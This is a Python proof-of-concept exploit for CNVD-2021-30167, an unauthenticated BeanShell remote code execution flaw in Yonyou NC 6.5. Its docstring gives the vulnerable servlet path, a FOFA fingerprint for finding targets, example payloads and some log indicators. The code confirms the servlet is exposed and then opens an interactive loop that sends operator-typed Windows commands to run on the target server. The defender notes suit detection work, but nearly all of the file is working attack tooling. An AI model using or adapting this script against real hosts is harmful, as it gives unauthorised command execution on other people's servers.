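"""CNVD-2021-30167: Yonyou NC BeanShell remote code execution (proof of concept).

Summary of the README that accompanies this script:

* Identifier: CNVD-2021-30167
* Affected version: NC6.5
* FOFA fingerprint: icon_hash="1085941792"
* Cause: Yonyou NC exposes its BeanShell interface to the network, so a client
  can reach it without authentication and submit script that the server runs
  with the privileges of the NC service.
* Entry point (GET): /servlet/~ic/bsh.servlet.BshServlet
* Script examples given in the README (sic): exec("whomai"),
  exec("cmd /c whoami"), exec("/bin/sh whoami")
* The command wrapper in this script only fits Windows hosts; the README says
  Linux has to be tested by hand.

What a defender can look for, going by the requests this script sends:

* a GET to the servlet path above, followed by POSTs to the same path whose
  form body consists of a single ``bsh.script`` field;
* a fixed User-Agent that ends in ``Safari/537.360``.

Because the root cause is the exposed servlet, that path should not be
reachable by unauthenticated clients.
"""
import re
import sys
from urllib.parse import quote

import requests

# ANSI escape sequences used to colour console output.
RED = '\x1b[1;91m'
BLUE = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'

# Path of the BeanShell servlet, appended to the base URL the operator enters.
BSH_SERVLET_PATH = '/servlet/~ic/bsh.servlet.BshServlet'

# Sent unchanged on every request, which makes it usable as a log indicator.
USER_AGENT = (
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 '
    '(KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360'
)


def Title():
    """Print the banner naming the issue, affected version and author."""
    print(BOLD + '''
    Title: CNVD-2021-30167 用友NC BeanShell RCE
    Version: NC6.5
    Author: zjun
    HomePage: https://www.zjun.info
''' + ENDC)


def NcCheck(target_url):
    """Report whether the BeanShell servlet page is reachable on *target_url*.

    Sends one GET to the servlet path. A 200 response whose body contains the
    word ``BeanShell`` is treated as "page present, possibly vulnerable"; this
    is a presence heuristic, not proof that script execution works.

    Args:
        target_url: Base URL of the host, without the servlet path.

    Returns:
        The full servlet URL when the page is present.

    The process exits (status 0, as in the original script) when the request
    fails or the page is absent.
    """
    print(BLUE + '\n[*]正在检测漏洞是否存在\n' + ENDC)
    url = target_url + BSH_SERVLET_PATH
    headers = {'User-Agent': USER_AGENT}

    # Only the network call sits inside the try. The original wrapped the whole
    # branch in a bare `except:`, which also caught the SystemExit raised for
    # "not vulnerable" and then printed the "cannot connect" message as well.
    try:
        response = requests.get(url=url, headers=headers, timeout=5)
    except requests.RequestException:
        print(RED + '[-]无法与目标建立连接\n' + ENDC)
        sys.exit(0)

    if response.status_code == 200 and 'BeanShell' in response.text:
        print(GREEN + '[+]BeanShell页面存在, 可能存在漏洞: {}\n'.format(url) + ENDC)
        return url

    print(RED + '[-]漏洞不存在\n' + ENDC)
    sys.exit(0)


def NcRce(url):
    """Prompt for commands in a loop and print what the servlet returns.

    Each command is wrapped as ``exec("cmd /c ...")`` and POSTed in the
    ``bsh.script`` form field, so the wrapper only fits Windows hosts.

    Args:
        url: Full servlet URL as returned by ``NcCheck``.

    The process exits (status 0, as in the original script) when the request
    fails or the response carries no output block.
    """
    print(BLUE + "[*]在command后输入执行命令, 仅适用于Windoes, Linux请手动测试\n" + ENDC)
    headers = {
        'User-Agent': USER_AGENT,
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    # NOTE(review): the tag names in this pattern and in the two replace()
    # calls below were stripped when the page was extracted; `<pre>` is a
    # reconstruction and should be confirmed against the original file.
    output_pattern = re.compile('<pre>(.*?)</pre>', re.S)

    while True:
        command = input(BOLD + 'command: ' + ENDC)
        # Backslashes are doubled so they survive inside the BeanShell string
        # literal. The second positional argument of quote() is `safe`, not an
        # encoding; passing 'utf-8' there means '/' is percent-encoded too.
        data = 'bsh.script=' + quote(
            '''exec("cmd /c {}")'''.format(command.replace('\\', '\\\\')), 'utf-8')

        # Catch transport errors only, so an interrupt or a programming error
        # is no longer reported as an "unknown error".
        try:
            response = requests.post(url=url, headers=headers, data=data)
        except requests.RequestException:
            print(RED + '[-]未知错误\n' + ENDC)
            sys.exit(0)

        result = output_pattern.search(response.text)
        if result is None:
            # No output block in the response; the original reached the same
            # message through a TypeError swallowed by its bare `except:`.
            print(RED + '[-]未知错误\n' + ENDC)
            sys.exit(0)
        print(result[0].replace('<pre>', '').replace('</pre>', ''))


if __name__ == '__main__':
    Title()
    target_url = input(BOLD + 'Url: ' + ENDC)
    url = NcCheck(target_url)
    NcRce(url)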